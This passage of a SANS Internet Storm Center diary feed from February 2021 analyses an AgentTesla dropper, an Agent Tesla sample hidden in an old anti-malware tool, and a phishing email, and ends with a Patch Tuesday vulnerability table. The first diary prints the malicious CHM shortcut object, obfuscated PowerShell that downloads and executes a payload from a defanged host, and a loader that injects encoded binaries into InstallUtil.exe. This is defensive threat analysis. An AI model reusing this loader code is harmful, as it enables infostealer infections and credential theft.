The variable kldfdf is easy to decode (it's just a hex-encoded chunk of data):

<html> <title> Customer service </title> <head> </head> <body> <h2 align=center> Customer service </h2> <p> <h3 align=center> Please Wait... </h3> </p> </body> </html> <OBJECT id=shortcut classid="clsid:52a2aaae-085d-4187-97ea-8c30db990436" width=1 height=1> <PARAM name="Command" value="ShortCut"> <PARAM name="Item1" value=",C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe, -WindowStyle Hidden $vYeIZ='92^64^43^43^64^44^03^65^65^42^82^85^54^94^B3^72^72^02^E6^96^F6^A6^D2^02^37^27^16^86^34^96^96^36^37^16^42 ^02^D3^64^43^43^64^44^03^65^65^42^B3^D7^22^F5^42^87^03^22^D5^56^47^97^26^B5^D5^27^16^86^36^B5^B7^02^47^36^56^A6^ 26^F4^D2^86^36^16^54^27^F6^64^C7^02^92^72^E5^72^82^47^96^C6^07^37^E2^67^D6^42^02^D3^37^27^16^86^34^96^96^36^37^1 6^42^B3^92^72^76^07^A6^E2^23^16^47^C6^56^44^F2^47^C6^E2^16^27^56^86^F2^F2^A3^07^47^47^86^72^C2^46^F6^86^47^56^D4 [...code removed...] 6^34^26^72^B2^72^56^75^E2^47^72^B2^72^56^E4^02^47^36^72^B2^72^56^A6^26^F4^72^B2^72^D2^77^56^E4^82^72^D3^97^47^47 ^42^B3^23^23^07^42^02^D3^02^C6^F6^36^F6^47^F6^27^05^97^47^96^27^57^36^56^35^A3^A3^D5^27^56^76^16^E6^16^D4^47^E6^ 96^F6^05^56^36^96^67^27^56^35^E2^47^56^E4^E2^D6^56^47^37^97^35^B5^B3^92^23^73^03^33^02^C2^D5^56^07^97^45^C6^F6^3 6^F6^47^F6^27^05^97^47^96^27^57^36^56^35^E2^47^56^E4^E2^D6^56^47^37^97^35^B5^82^47^36^56^A6^26^F4^F6^45^A3^A3^D5 ^D6^57^E6^54^B5^02^D3^02^23^23^07^42';$text =$vYeIZ.ToCharArray();[Array]::Reverse($text);$tu=-join $text;$jm=$tu.Split('^') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''| & (-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])}))"> </OBJECT> <SCRIPT> shortcut.Click(); </SCRIPT>

How is the Powershell script executed? An object shortcut is created with the parameter Item1 containing the command to execute. The trick is to use the method Click() on the object to make it automatically executed without the user's interaction[4].

Here is the decoded Powershell new script:

$p22 = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $p22; $tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|I`E`X;[void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic'); do {   $ping = test-connection -comp google.com -count 1 -Quiet } until ($ping); $mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Dow' + 'nlo' + 'adS' + 'tring',[Microsoft.VisualBasic.CallType]::Method,'hxxp://hera[.]lt/Delta2.jpg'); $asciiChars= $mv.split('^') |ForEach-Object {[char][byte]"0x$_"}; $VV0DF44F= $asciiChars -join ''; IEX($VV0DF44F)

This code downloads a fake picture (hxxp://hera[.]lt/Delta2.jpg) that contains another Powershell script. This one will drop and execute the malware on the infected system:

$e00fgfg4=(-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])})) sal c0d4s75 $e00fgfg4 function AfdEYmOP {       param($GjruFEh)       $GjruFEh = $GjruFEh -split '(..)' | ? { $_ }       ForEach ($aYLEzWVc in $GjruFEh) {           [Convert]::ToInt32($aYLEzWVc,16)       } } [String]$vhghWAdfB='4D5A9@!@!3@!@!@!04@!@!@!FFFF@!@!B8@!@!@!@!@!@!@!4@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@ !@!@!@!@!@!@!@!@!@!@!@!@!@!08@!@!@!@!E1FBA0E@!B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072 756E20696E20444F53206D6F64652E0D0D0A24@!@!@!@!@!@!@!5045@!@!4C0103@!46D6196@!@!@!@!@!@!@!@!0E@!@!E210B0108@!@!62 01@!@!06@!@!@!@!@!@!7E8@!1@!@!2@!@!@!0A@!1@!@!@!4@!@!02@!@!@!@!2@!@!04@!@!@!@!@!@!@!04@!@!@!@!@!@!@!@!E@!1@!@!02 [...code removed...] !@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@ !@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@ !@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@ !@!@!0'.replace('@!','00')   [Byte[]]$lqct=AfdEYmOP $vhghWAdfB  $j1e0d='[System.Ap@@#>@#<<<<<%%%%^^*******>>><<||||@!!!!!!!@@@@@@@@@ain]'.replace('@@#>@#<<<<<%%%%^^*******>>><<||||@!!!!!!!@@@@@@@@@','pDom')|c0d4s75;$b05d=$j1e0d.GetMethod("get_CurrentDomain") [String]$lkgY='1F8B08@!@!@!@!@!04@!CCBD07BC5C45F5387EF7EEEE6DDBDEECEEBB5BDFBB9B7E79FB125228EF2590842A553A52C4845 E0C2CF0420D3C82620522A888C6801A152B563458B17714FD62D4489ED87B6F5F1592FF2933B7ED06F0FBF5FBFBFCF3C9BB3B73CECCDCB93 367CE9C3973E6CCB167DCA1A5354DCBC0DFEEDD9AF6A0C6FF566B4FFF6F23FC15BD8F16B507EC87673D983AE6E159275F74F154E7F22B7B1 [...code removed...] F897DAC1072A5CAA75DB5F72FCF6C2CE0B17E6DB4EC76BB87EF0D93D6A3474353F1F76A63E@!65B07F6446FC7D619E3F5AFAD50B37F7237F 1EB2E0F47A172EAB1E06FDA12F1FCEF3779CCF8B6A64B40C3E535CE3A0F4D51F44BA75FE0B1EAFE5365DFFEFD8EB4B17C25EA2FD841FC974 C3DD715BF32D7E7DF582E3AB0F71EF5F981F7AEACFD55FBDD0705ABEAB17259D5C3E6536C1D42F1F99FB2B974326F@!65D0E980AE4840AF9 87FDD54B103B3EF32FFF7D4FE41FBFFE3EBEFE2F31162CC5@!6203@!'.replace('@!','00') $dfffgrrr='$b05d.In@@#>@#<<<<<%%%%^^*******>>><<||||@!!!!!!!@@@@@@@@@ke($null,$null)'.replace('@@#>@#<<<<<%%%%^^*******>>><<||||@!!!!!!!@@@@@@@@@','vo')| c0d4s75 $jhugrdtf='$dfffgrrr.Lo@@#>@#<<<<<%%%%^^*******>>><<||||@!!!!!!!@@@@@@@@@($lqct)'.Replace('@@#>@#<<<<<%%%%^^*******>>><<||||@!!!!!!!@@@@@@@@@','ad') $jhugrdtf| c0d4s75 [Byte[]]$lkgY2= AfdEYmOP $lkgY [YESS]::f77df00sd('InstallUtil.exe',$lkgY2)

The first dumped file is a DLL (sha256:88774EAD57918BF293205D038402BD64FF6504D1CB1B72DBA2B50061DFE88C79). The second one is a PE file (sha256:39ecb2d1c2a4aa01e62effc56bb27ee8d1fe34ec43e5c99ee0b138410cfa2ca9). Both are unknown on VT. The DLL provides the [YESS]::f77df00sd function that presumably injects the PE file into a copy of InstallUtil.exe (a tool included in the Microsoft .Net framework). The PE file is a classic AgentTesla!

[1] https://isc.sans.edu/forums/diary/New+Example+of+XSL+Script+Processing+aka+Mitre+T1220/27056/
[2] https://en.wikipedia.org/wiki/Microsoft_Compiled_HTML_Help
[3] https://www.virustotal.com/gui/file/af9fe480abc56cf1e1354eb243ec9f5bee9cac0d75df38249d1c64236132ceab/detection
[4] https://docs.microsoft.com/en-us/previous-versions/windows/desktop/htmlhelp/click-and-hhclick-method

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. február 12.

ISC Stormcast For Friday, February 12th, 2021 https://isc.sans.edu/podcastdetail.html&#x3f;id=7370, (Fri, Feb 12th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. február 11.

Agent Tesla hidden in a historical anti-malware tool, (Thu, Feb 11th)

While going through attachments of e-mails, which were caught in my e-mail quarantine since the beginning of February, I found an ISO file with what turned out to be a sample of the Agent Tesla infostealer. That, by itself, would not be that unusual, but the Agent Tesla sample turned out to be unconventional in more ways than one...

The e-mail carrying the ISO attachment was a run-of-the-mill-looking malspam, informing the recipient about a new delivery from DHL. It had a spoofed sender address “dhlSender@dhl.com”, which – although looking at least somewhat believable – certainly didn’t have the impact of making the message appear trustworthy, which is what the authors of the e-mail were most likely hoping for. On the contrary, it must have resulted in very few of the messages actually making it past any security analysis on e-mail gateways. The reason is that DHL has a valid SPF record set up for dhl.com, so any SPF check (i.e. something that most of the worlds e-mail servers perform automatically these days) would lead to a “soft fail” result, which would consequently most likely lead to the message being quarantined (if not deleted outright).

The attached file Download_Tracking_Reference.01.02.2021.xlsx.iso contained only one EXE with identical name (except for the second extension, of course).

The executable was written in VB.NET and its malicious payload was hidden in it in an interesting way – the file had two bitmaps embedded in its Resources section, both of which were in fact encoded/encrypted DLLs.

While the use of bitmaps for embedding DLLs is not new for Agent Tesla[1], it is certainly an interesting way to hide malicious code and prevent its detection. In this case, it didn’t seem to help the file too much, given its 41/71 VT score at the time of writing[2], but it is quite imaginative technique nonetheless.

After the file was executed, it would first decode and load a small (10kB) DLL named BestFit.dll.

Using this first DLL, the malware would then decode, decrypt and load a much larger (430kB) DLL called PositiveSign.dll.

Since the second DLL was heavily obfuscated and its authors used couple of anti-analysis techniques in it, I didn’t have time to go through it in detail, but from the portions of the code I saw, it did appear to contain the final stage of the payload.

What turned out to be even more interesting than the use bitmaps to store encoded/encrypted DLLs, however, was the code of the original executable, in which the "malicious bitmaps" were hidden. The EXE, which was originally named HashHelpers.exe, had its description and product name set to Virus Effect Remover. This was a name of a legitimate anti-malware tool developed during the 2000s and first half of 2010s.

This, by itself, would not be that unusual, since malware authors sometimes like to name their creations in creative or provocative ways. Nevertheless, in this case, the name wasn’t the only thing which authors of Agent Tesla borrowed from the anti-malware tool… They reused significant portions of its code as well.

When comparing the malicious file with the latest available release of the real tool[3], it can be clearly seen that large parts of both binaries are (nearly) identical.

Although the original code in the malicious EXE is never executed, authors of the malware reused large parts of it when making their creation. Since Virus Effect Remover was also written in VB.NET, getting to the code and repurposing it, even if they were working from a compiled executable, would of course be trivial for them.

Even though use of "trojanized" security tools is not a novel concept by any means, I think this was the first time I’ve seen it done in this way – i.e. by using code of an old anti-malware solution without trying to pass the resulting executable to target users as the original tool.

While we can only speculate on why creators of the malicious code chose to hide it in a code of a historical security tool, by far the most probable explanation seems to be that this was done in an attempt to make the malware seem benign to anti-malware scanners. And since some security tools use signature-based allow-listing mechanisms to avoid scanning of known security tools, this might have actually worked in some instances...

 

Indicators of Compromise (IoCs)
Download_Tracking_Reference.01.02.2021.xlsx.iso (806 kB)
MD5 - 2ceb9c4347aed5dd387d261b40473f46
SHA-1 - d4b93dd1bfb531b228353451977185f039407741

Download_Tracking_Reference.01.02.2021.xlsx.exe / HashHelpers.exe (745 kB)
MD5 - 9417df6dc7d716b0b69e587c9d89981b
SHA-1 - e905472faad91b87dbfc7afc838564fde3c87aa3

BestFit.dll (10 kB)
MD5 - a32a0b1cc226475671801360f6c53419
SHA-1 - aa6d74a2db3c430175e79f581afc29240b17ae6c

PositiveSign.dll (430 kB)
MD5 - 8b1e495e40571a5912f672f38f47058d
SHA-1 - c900af54932bdd4c8fd749cecb5689e7e2082037

 

[1] https://www.zscaler.com/blogs/security-research/linkedin-job-seeker-phishing-campaign-spreads-agent-tesla
[2] https://www.virustotal.com/gui/file/101399675ec99fcca0b69a0d6c146431c3a28c10d322499c817b2197e86971b5/detection
[3] https://sourceforge.net/projects/viruseffectremo/

-----------
Jan Kopriva
@jk0pr
Alef Nula

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. február 11.

ISC Stormcast For Thursday, February 11th, 2021 https://isc.sans.edu/podcastdetail.html&#x3f;id=7368, (Thu, Feb 11th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. február 10.

ISC Stormcast For Wednesday, February 10th, 2021 https://isc.sans.edu/podcastdetail.html&#x3f;id=7366, (Wed, Feb 10th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. február 10.

Phishing message to the ISC handlers email distro, (Wed, Feb 10th)

Introduction

The ISC handlers email distro gets plenty of spam and phishing emails on a daily basis.  Most of these are filtered so they never make it to the inbox; however, every once in a while one gets through.

Today's diary reviews an example of a phishing email from our inbox on Tuesday 2021-02-09.


Shown above:  Email headers from the phishing message.

The email

As shown in the previous image, the sending address had been spoofed to look like it came from administrator@sans.isc.edu.  But the message actually came to our mail server from 165.232.128[.]118.  That much we can confirm, because it was the most recent Received: from line before it hit our mail server.  Anything else can be spoofed.  Based on the only other Received: from line, this message might have originated from 69.12.85[.]209, but that line could have been added to confuse analysts.


Shown above:  Screenshot of the phishing messaged when viewed in the Thunderbird email client.

The phishing message has a URL to hxxps://soberlab[.]ca/sl.html?email=[phishing recipient's email address].  The domain oberlab[.]ca seems like it is hosting a legitimate website, and that legitimate website may have been compromised to host the phishing URL.


Shown above:  Opening link from the phishing message in a web browser.

Phishing traffic


Shown above:  Traffic from viewing the email link filtered in Wireshark.

The HTTPS link from the email redirects to a phishing page at hxxp://aromatee[.]com[.]au/inc/mail.php.  Like the previous URL, this one looks like it's hosted on a legitimate domain using a server that's been compromised to host a phishing URL.  I entered a fake password, and the data was sent over HTTP back to the server.


Shown above:  HTTP POST request with the fake password I entered.

Final words

These types of emails are all too common, and they're remarkably cost-effective.  While most of you wouldn't fall for it, people are fooled by similar messages.  Therefore, phishing will remain a viable social engineering technique.

A sanitized version of the email shown in this diary, along with a pcap of traffic to the associated phishing page, can be found here.

---
Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. február 9.

Microsoft February 2021 Patch Tuesday, (Tue, Feb 9th)

This month we got patches for 56 vulnerabilities. Of these, 11 are critical, 1 is being exploited and 6 were previously disclosed.

The exploited vulnerability is an elevation of privilege vulnerability affecting Win32k (CVE-2021-1732). This is a local vulnerability, which means that to exploit the vulnerability, an attacker would have to have local access to the machine (console or SSH for example) or rely on user interaction, like a user opening a malicious document.  The CVSS v3 score for this vulnerability is 7.80.

The highest CVSS score this month (9.80) was given to 4 vulnerabilities. One of those is a critical Remote Code Execution (RCE) vulnerability in Microsoft DNS Server (CVE-2021-24078). This vulnerability would allow a remote unauthenticated attacker to execute code with the service privilege on the target host. As this vulnerability does not require user interaction, this is a potentially wormable vulnerability that requires your attention if you have Microsoft DNS Server in your network – specially exposed to the Internet.

There are also two RCEs worth mentioning this month affecting Windows TCP/IP. The first (CVE-2021-24074) affects IPV4 and involve source routing. Despite source routing being blocked by default in Windows, the system will process the request and return an ICMP message denying the request. There is a workaround for this vulnerability documented in Microsoft advisory that will cause the system to drop these requests altogether without any processing. The vulnerability affecting IPV6 (CVE-2021-24094) is related to package fragmentation. Both vulnerabilities are CVSS v3 9.80.

Amongst already disclosed vulnerabilities, there is a critical RCE affecting .Net Core 2.0, 3.1 and 5.0 (CVE-2021-26701). The CVSS v3 for this vulnerability is 8.10. There are no details.

See Renato's dashboard for a more detailed breakout: https://patchtuesdaydashboard.com.

February 2021 Security Updates

Description CVE Disclosed Exploited Exploitability (old versions) current version Severity CVSS Base (AVG) CVSS Temporal (AVG) .NET Core Remote Code Execution Vulnerability %%cve:2021-24112%% No No Less Likely Less Likely Critical 8.1 7.3 %%cve:2021-26701%% Yes No Less Likely Less Likely Critical 8.1 7.1 .NET Core and Visual Studio Denial of Service Vulnerability %%cve:2021-1721%% Yes No Less Likely Less Likely Important 6.5 5.9 .NET Framework Denial of Service Vulnerability %%cve:2021-24111%% No No Less Likely Less Likely Important 7.5 6.5 Azure IoT CLI extension Elevation of Privilege Vulnerability %%cve:2021-24087%% No No Less Likely Less Likely Important 7.0 6.1 Microsoft Azure Kubernetes Service Elevation of Privilege Vulnerability %%cve:2021-24109%% No No Less Likely Less Likely Moderate 6.8 5.9 Microsoft Dataverse Information Disclosure Vulnerability %%cve:2021-24101%% No No Less Likely Less Likely Important 6.5 5.9 Microsoft Defender Elevation of Privilege Vulnerability %%cve:2021-24092%% No No Less Likely Less Likely Important 7.8 6.8 Microsoft Dynamics Business Central Cross-site Scripting Vulnerability %%cve:2021-1724%% No No Less Likely Less Likely Important 6.1 5.5 Microsoft Edge for Android Information Disclosure Vulnerability %%cve:2021-24100%% No No Less Likely Less Likely Important 5.0 4.5 Microsoft Excel Remote Code Execution Vulnerability %%cve:2021-24067%% No No Less Likely Less Likely Important 7.8 6.8 %%cve:2021-24068%% No No Less Likely Less Likely Important 7.8 6.8 %%cve:2021-24069%% No No Less Likely Less Likely Important 7.8 6.8 %%cve:2021-24070%% No No Less Likely Less Likely Important 7.8 6.8 Microsoft Exchange Server Spoofing Vulnerability %%cve:2021-24085%% No No Less Likely Less Likely Important 6.5 5.7 %%cve:2021-1730%% No No Less Likely Less Likely Important 5.4 4.9 Microsoft SharePoint Information Disclosure Vulnerability %%cve:2021-24071%% No No Less Likely Less Likely Important 5.3 4.8 Microsoft SharePoint Remote Code Execution Vulnerability %%cve:2021-24066%% No No More Likely More Likely Important 8.8 7.7 Microsoft SharePoint Server Remote Code Execution Vulnerability %%cve:2021-24072%% No No More Likely More Likely Important 8.8 7.7 Microsoft SharePoint Spoofing Vulnerability %%cve:2021-1726%% No No Less Likely Less Likely Important 8.0 7.0 Microsoft Teams iOS Information Disclosure Vulnerability %%cve:2021-24114%% No No Less Likely Less Likely Important 5.7 5.0 Microsoft Windows Codecs Library Remote Code Execution Vulnerability %%cve:2021-24081%% No No Less Likely Less Likely Critical 7.8 7.0 Microsoft Windows VMSwitch Information Disclosure Vulnerability %%cve:2021-24076%% No No Less Likely Less Likely Important 5.5 5.0 Microsoft.PowerShell.Utility Module WDAC Security Feature Bypass Vulnerability %%cve:2021-24082%% No No Less Likely Less Likely Important 4.3 3.8 PFX Encryption Security Feature Bypass Vulnerability %%cve:2021-1731%% No No Less Likely Less Likely Important 5.5 4.8 Package Managers Configurations Remote Code Execution Vulnerability %%cve:2021-24105%% No No Less Likely Less Likely Important 8.4 7.6 Skype for Business and Lync Denial of Service Vulnerability %%cve:2021-24099%% No No Less Likely Less Likely Important 6.5 5.7 Skype for Business and Lync Spoofing Vulnerability %%cve:2021-24073%% No No Less Likely Less Likely Important 6.5 5.9 Sysinternals PsExec Elevation of Privilege Vulnerability %%cve:2021-1733%% Yes No Less Likely Less Likely Important 7.8 7.0 System Center Operations Manager Elevation of Privilege Vulnerability %%cve:2021-1728%% No No Less Likely Less Likely Important 8.8 7.7 Visual Studio Code Remote Code Execution Vulnerability %%cve:2021-1639%% No No Less Likely Less Likely Important 7.0 6.1 Visual Studio Code npm-script Extension Remote Code Execution Vulnerability %%cve:2021-26700%% No No Less Likely Less Likely Important 7.8 6.8 Windows Address Book Remote Code Execution Vulnerability %%cve:2021-24083%% No No Less Likely Less Likely Important 7.8 6.8 Windows Backup Engine Information Disclosure Vulnerability %%cve:2021-24079%% No No Less Likely Less Likely Important 5.5 4.8 Windows Camera Codec Pack Remote Code Execution Vulnerability %%cve:2021-24091%% No No Less Likely Less Likely Critical 7.8 6.8 Windows Console Driver Denial of Service Vulnerability %%cve:2021-24098%% Yes No Less Likely Less Likely Important 5.5 4.8 Windows DNS Server Remote Code Execution Vulnerability %%cve:2021-24078%% No No More Likely More Likely Critical 9.8 8.5 Windows DirectX Information Disclosure Vulnerability %%cve:2021-24106%% Yes No Less Likely Less Likely Important 5.5 4.8 Windows Event Tracing Elevation of Privilege Vulnerability %%cve:2021-24102%% No No Less Likely Less Likely Important 7.8 6.8 %%cve:2021-24103%% No No Less Likely Less Likely Important 7.8 6.8 Windows Fax Service Remote Code Execution Vulnerability %%cve:2021-1722%% No No Less Likely Less Likely Critical 8.1 7.1 %%cve:2021-24077%% No No Less Likely Less Likely Critical 9.8 8.5 Windows Graphics Component Remote Code Execution Vulnerability %%cve:2021-24093%% No No Less Likely Less Likely Critical 8.8 7.7 Windows Installer Elevation of Privilege Vulnerability %%cve:2021-1727%% Yes No More Likely More Likely Important 7.8 7.0 Windows Kernel Elevation of Privilege Vulnerability %%cve:2021-24096%% No No Less Likely Less Likely Important 7.8 6.8 Windows Local Spooler Remote Code Execution Vulnerability %%cve:2021-24088%% No No Less Likely Less Likely Critical 8.8 7.7 Windows Mobile Device Management Information Disclosure Vulnerability %%cve:2021-24084%% No No Less Likely Less Likely Important 5.5 4.8 Windows Network File System Denial of Service Vulnerability %%cve:2021-24075%% No No Less Likely Less Likely Important 6.8 5.9 Windows PKU2U Elevation of Privilege Vulnerability %%cve:2021-25195%% No No Less Likely Less Likely Important 7.8 6.8 Windows Remote Procedure Call Information Disclosure Vulnerability %%cve:2021-1734%% No No Less Likely Less Likely Important 7.5 6.5 Windows TCP/IP Denial of Service Vulnerability %%cve:2021-24086%% No No More Likely More Likely Important 7.5 6.5 Windows TCP/IP Remote Code Execution Vulnerability %%cve:2021-24074%% No No More Likely More Likely Critical 9.8 8.5 %%cve:2021-24094%% No No More Likely More Likely Critical 9.8 8.5 Windows Trust Verification API Denial of Service Vulnerability %%cve:2021-24080%% No No Less Likely Less Likely Moderate 6.5 5.7 Windows Win32k Elevation of Privilege Vulnerability %%cve:2021-1732%% No Yes Detected Detected Important 7.8 7.2 %%cve:2021-1698%% No No More Likely More Likely Important 7.8 6.8

--
Renato Marinho
Morphus Labs| LinkedIn|Twitter

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. február 9.

ISC Stormcast For Tuesday, February 9th, 2021 https://isc.sans.edu/podcastdetail.html&#x3f;id=7364, (Tue, Feb 9th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.